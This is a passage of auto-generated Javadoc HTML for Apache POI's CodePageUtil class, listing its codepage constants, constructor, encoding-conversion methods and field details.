class="colLast" scope="col">Field and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_037">CP_037</a></strong></code> <div class="block">Codepage 037, a special case</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_EUC_JP">CP_EUC_JP</a></strong></code> <div class="block">Codepage for EUC-JP</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_EUC_KR">CP_EUC_KR</a></strong></code> <div class="block">Codepage for EUC-KR</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_GB18030">CP_GB18030</a></strong></code> <div class="block">Codepage for GB18030</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_GB2312">CP_GB2312</a></strong></code> <div class="block">Codepage for GB2312</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_GBK">CP_GBK</a></strong></code> <div class="block">Codepage for GBK, aka MS936</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_2022_JP1">CP_ISO_2022_JP1</a></strong></code> <div class="block">Codepage for ISO-2022-JP</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_2022_JP2">CP_ISO_2022_JP2</a></strong></code> <div class="block">Another codepage for ISO-2022-JP</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_2022_JP3">CP_ISO_2022_JP3</a></strong></code> <div class="block">Yet another codepage for ISO-2022-JP</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_2022_KR">CP_ISO_2022_KR</a></strong></code> <div class="block">Codepage for ISO-2022-KR</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_8859_1">CP_ISO_8859_1</a></strong></code> <div class="block">Codepage for ISO-8859-1</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_8859_2">CP_ISO_8859_2</a></strong></code> <div class="block">Codepage for ISO-8859-2</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_8859_3">CP_ISO_8859_3</a></strong></code> <div class="block">Codepage for ISO-8859-3</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_8859_4">CP_ISO_8859_4</a></strong></code> <div class="block">Codepage for ISO-8859-4</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_8859_5">CP_ISO_8859_5</a></strong></code> <div class="block">Codepage for ISO-8859-5</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_8859_6">CP_ISO_8859_6</a></strong></code> <div class="block">Codepage for ISO-8859-6</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_8859_7">CP_ISO_8859_7</a></strong></code> <div class="block">Codepage for ISO-8859-7</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_8859_8">CP_ISO_8859_8</a></strong></code> <div class="block">Codepage for ISO-8859-8</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_ISO_8859_9">CP_ISO_8859_9</a></strong></code> <div class="block">Codepage for ISO-8859-9</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_JOHAB">CP_JOHAB</a></strong></code> <div class="block">Codepage for Johab</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_KOI8_R">CP_KOI8_R</a></strong></code> <div class="block">Codepage for KOI8-R</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_ARABIC">CP_MAC_ARABIC</a></strong></code> <div class="block">Codepage for Macintosh Arabic (Java: MacArabic)</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_CENTRAL_EUROPE">CP_MAC_CENTRAL_EUROPE</a></strong></code> <div class="block">Codepage for Macintosh Central Europe (Latin-2) (Java: MacCentralEurope)</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_CHINESE_SIMPLE">CP_MAC_CHINESE_SIMPLE</a></strong></code> <div class="block">Codepage for Macintosh Chinese Simplified (Java: unknown - use EUC_CN, ISO2022_CN_GB, MS936 or cp935)</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_CHINESE_TRADITIONAL">CP_MAC_CHINESE_TRADITIONAL</a></strong></code> <div class="block">Codepage for Macintosh Chinese Traditional (Java: unknown - use Big5, MS950, or cp937)</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_CROATIAN">CP_MAC_CROATIAN</a></strong></code> <div class="block">Codepage for Macintosh Croatian (Java: MacCroatian)</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_CYRILLIC">CP_MAC_CYRILLIC</a></strong></code> <div class="block">Codepage for Macintosh Cyrillic (Java: MacCyrillic)</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_GREEK">CP_MAC_GREEK</a></strong></code> <div class="block">Codepage for Macintosh Greek (Java: MacGreek)</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_HEBREW">CP_MAC_HEBREW</a></strong></code> <div class="block">Codepage for Macintosh Hebrew (Java: MacHebrew)</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_ICELAND">CP_MAC_ICELAND</a></strong></code> <div class="block">Codepage for Macintosh Iceland (Java: MacIceland)</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_JAPAN">CP_MAC_JAPAN</a></strong></code> <div class="block">Codepage for Macintosh Japan (Java: unknown - use SJIS, cp942 or cp943)</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_KOREAN">CP_MAC_KOREAN</a></strong></code> <div class="block">Codepage for Macintosh Korean (Java: unknown - use EUC_KR or cp949)</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_ROMAN">CP_MAC_ROMAN</a></strong></code> <div class="block">Codepage for Macintosh Roman (Java: MacRoman)</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_ROMANIA">CP_MAC_ROMANIA</a></strong></code> <div class="block">Codepage for Macintosh Romanian (Java: MacRomania)</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_THAI">CP_MAC_THAI</a></strong></code> <div class="block">Codepage for Macintosh Thai (Java: MacThai)</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_TURKISH">CP_MAC_TURKISH</a></strong></code> <div class="block">Codepage for Macintosh Turkish (Java: MacTurkish)</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MAC_UKRAINE">CP_MAC_UKRAINE</a></strong></code> <div class="block">Codepage for Macintosh Ukrainian (Java: MacUkraine)</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_MS949">CP_MS949</a></strong></code> <div class="block">Codepage for MS949</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_SJIS">CP_SJIS</a></strong></code> <div class="block">Codepage for SJIS</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_UNICODE">CP_UNICODE</a></strong></code> <div class="block">Codepage for Unicode</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_US_ACSII">CP_US_ACSII</a></strong></code> <div class="block">Codepage for US-ASCII</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_US_ASCII2">CP_US_ASCII2</a></strong></code> <div class="block">Another codepage for US-ASCII</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_UTF16">CP_UTF16</a></strong></code> <div class="block">Codepage for UTF-16</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_UTF16_BE">CP_UTF16_BE</a></strong></code> <div class="block">Codepage for UTF-16 big-endian</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_UTF8">CP_UTF8</a></strong></code> <div class="block">Codepage for UTF-8</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_WINDOWS_1250">CP_WINDOWS_1250</a></strong></code> <div class="block">Codepage for Windows 1250</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_WINDOWS_1251">CP_WINDOWS_1251</a></strong></code> <div class="block">Codepage for Windows 1251</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_WINDOWS_1252">CP_WINDOWS_1252</a></strong></code> <div class="block">Codepage for Windows 1252</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_WINDOWS_1253">CP_WINDOWS_1253</a></strong></code> <div class="block">Codepage for Windows 1253</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_WINDOWS_1254">CP_WINDOWS_1254</a></strong></code> <div class="block">Codepage for Windows 1254</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_WINDOWS_1255">CP_WINDOWS_1255</a></strong></code> <div class="block">Codepage for Windows 1255</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_WINDOWS_1256">CP_WINDOWS_1256</a></strong></code> <div class="block">Codepage for Windows 1256</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_WINDOWS_1257">CP_WINDOWS_1257</a></strong></code> <div class="block">Codepage for Windows 1257</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CP_WINDOWS_1258">CP_WINDOWS_1258</a></strong></code> <div class="block">Codepage for Windows 1258</div> </td> </tr> </table> </li> </ul> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#CodePageUtil()">CodePageUtil</a></strong>()</code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>static java.lang.String</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#codepageToEncoding(int)">codepageToEncoding</a></strong>(int&nbsp;codepage)</code> <div class="block">Turns a codepage number into the equivalent character encoding's name (in Java NIO canonical naming format).</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static java.lang.String</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#codepageToEncoding(int, boolean)">codepageToEncoding</a></strong>(int&nbsp;codepage, boolean&nbsp;javaLangFormat)</code> <div class="block">Turns a codepage number into the equivalent character encoding's name, in either Java NIO or Java Lang canonical naming.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static byte[]</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#getBytesInCodePage(java.lang.String, int)">getBytesInCodePage</a></strong>(java.lang.String&nbsp;string, int&nbsp;codepage)</code> <div class="block">Converts a string into bytes, in the equivalent character encoding to the supplied codepage number.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static java.lang.String</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#getStringFromCodePage(byte[], int)">getStringFromCodePage</a></strong>(byte[]&nbsp;string, int&nbsp;codepage)</code> <div class="block">Converts the bytes into a String, based on the equivalent character encoding to the supplied codepage number.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static java.lang.String</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/poi/util/CodePageUtil.html#getStringFromCodePage(byte[], int, int, int)">getStringFromCodePage</a></strong>(byte[]&nbsp;string, int&nbsp;offset, int&nbsp;length, int&nbsp;codepage)</code> <div class="block">Converts the bytes into a String, based on the equivalent character encoding to the supplied codepage number.</div> </td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ FIELD DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="field_detail"> <!-- --> </a> <h3>Field Detail</h3> <a name="CP_037"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_037</h4> <pre>public static final&nbsp;int CP_037</pre> <div class="block"><p>Codepage 037, a special case</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_037">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_SJIS"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_SJIS</h4> <pre>public static final&nbsp;int CP_SJIS</pre> <div class="block"><p>Codepage for SJIS</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_SJIS">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_GBK"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_GBK</h4> <pre>public static final&nbsp;int CP_GBK</pre> <div class="block"><p>Codepage for GBK, aka MS936</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_GBK">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MS949"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MS949</h4> <pre>public static final&nbsp;int CP_MS949</pre> <div class="block"><p>Codepage for MS949</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MS949">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_UTF16"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_UTF16</h4> <pre>public static final&nbsp;int CP_UTF16</pre> <div class="block"><p>Codepage for UTF-16</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_UTF16">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_UTF16_BE"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_UTF16_BE</h4> <pre>public static final&nbsp;int CP_UTF16_BE</pre> <div class="block"><p>Codepage for UTF-16 big-endian</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_UTF16_BE">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_WINDOWS_1250"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_WINDOWS_1250</h4> <pre>public static final&nbsp;int CP_WINDOWS_1250</pre> <div class="block"><p>Codepage for Windows 1250</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_WINDOWS_1250">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_WINDOWS_1251"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_WINDOWS_1251</h4> <pre>public static final&nbsp;int CP_WINDOWS_1251</pre> <div class="block"><p>Codepage for Windows 1251</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_WINDOWS_1251">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_WINDOWS_1252"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_WINDOWS_1252</h4> <pre>public static final&nbsp;int CP_WINDOWS_1252</pre> <div class="block"><p>Codepage for Windows 1252</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_WINDOWS_1252">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_WINDOWS_1253"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_WINDOWS_1253</h4> <pre>public static final&nbsp;int CP_WINDOWS_1253</pre> <div class="block"><p>Codepage for Windows 1253</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_WINDOWS_1253">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_WINDOWS_1254"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_WINDOWS_1254</h4> <pre>public static final&nbsp;int CP_WINDOWS_1254</pre> <div class="block"><p>Codepage for Windows 1254</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_WINDOWS_1254">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_WINDOWS_1255"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_WINDOWS_1255</h4> <pre>public static final&nbsp;int CP_WINDOWS_1255</pre> <div class="block"><p>Codepage for Windows 1255</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_WINDOWS_1255">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_WINDOWS_1256"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_WINDOWS_1256</h4> <pre>public static final&nbsp;int CP_WINDOWS_1256</pre> <div class="block"><p>Codepage for Windows 1256</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_WINDOWS_1256">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_WINDOWS_1257"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_WINDOWS_1257</h4> <pre>public static final&nbsp;int CP_WINDOWS_1257</pre> <div class="block"><p>Codepage for Windows 1257</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_WINDOWS_1257">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_WINDOWS_1258"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_WINDOWS_1258</h4> <pre>public static final&nbsp;int CP_WINDOWS_1258</pre> <div class="block"><p>Codepage for Windows 1258</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_WINDOWS_1258">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_JOHAB"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_JOHAB</h4> <pre>public static final&nbsp;int CP_JOHAB</pre> <div class="block"><p>Codepage for Johab</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_JOHAB">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_ROMAN"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_ROMAN</h4> <pre>public static final&nbsp;int CP_MAC_ROMAN</pre> <div class="block"><p>Codepage for Macintosh Roman (Java: MacRoman)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_ROMAN">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_JAPAN"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_JAPAN</h4> <pre>public static final&nbsp;int CP_MAC_JAPAN</pre> <div class="block"><p>Codepage for Macintosh Japan (Java: unknown - use SJIS, cp942 or cp943)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_JAPAN">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_CHINESE_TRADITIONAL"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_CHINESE_TRADITIONAL</h4> <pre>public static final&nbsp;int CP_MAC_CHINESE_TRADITIONAL</pre> <div class="block"><p>Codepage for Macintosh Chinese Traditional (Java: unknown - use Big5, MS950, or cp937)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_CHINESE_TRADITIONAL">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_KOREAN"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_KOREAN</h4> <pre>public static final&nbsp;int CP_MAC_KOREAN</pre> <div class="block"><p>Codepage for Macintosh Korean (Java: unknown - use EUC_KR or cp949)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_KOREAN">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_ARABIC"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_ARABIC</h4> <pre>public static final&nbsp;int CP_MAC_ARABIC</pre> <div class="block"><p>Codepage for Macintosh Arabic (Java: MacArabic)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_ARABIC">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_HEBREW"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_HEBREW</h4> <pre>public static final&nbsp;int CP_MAC_HEBREW</pre> <div class="block"><p>Codepage for Macintosh Hebrew (Java: MacHebrew)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_HEBREW">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_GREEK"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_GREEK</h4> <pre>public static final&nbsp;int CP_MAC_GREEK</pre> <div class="block"><p>Codepage for Macintosh Greek (Java: MacGreek)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_GREEK">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_CYRILLIC"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_CYRILLIC</h4> <pre>public static final&nbsp;int CP_MAC_CYRILLIC</pre> <div class="block"><p>Codepage for Macintosh Cyrillic (Java: MacCyrillic)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_CYRILLIC">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_CHINESE_SIMPLE"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_CHINESE_SIMPLE</h4> <pre>public static final&nbsp;int CP_MAC_CHINESE_SIMPLE</pre> <div class="block"><p>Codepage for Macintosh Chinese Simplified (Java: unknown - use EUC_CN, ISO2022_CN_GB, MS936 or cp935)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_CHINESE_SIMPLE">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_ROMANIA"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_ROMANIA</h4> <pre>public static final&nbsp;int CP_MAC_ROMANIA</pre> <div class="block"><p>Codepage for Macintosh Romanian (Java: MacRomania)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_ROMANIA">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_UKRAINE"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CP_MAC_UKRAINE</h4> <pre>public static final&nbsp;int CP_MAC_UKRAINE</pre> <div class="block"><p>Codepage for Macintosh Ukrainian (Java: MacUkraine)</p></div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../constant-values.html#org.apache.poi.util.CodePageUtil.CP_MAC_UKRAINE">Constant Field Values</a></dd></dl> </li> </ul> <a name="CP_MAC_THAI"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> 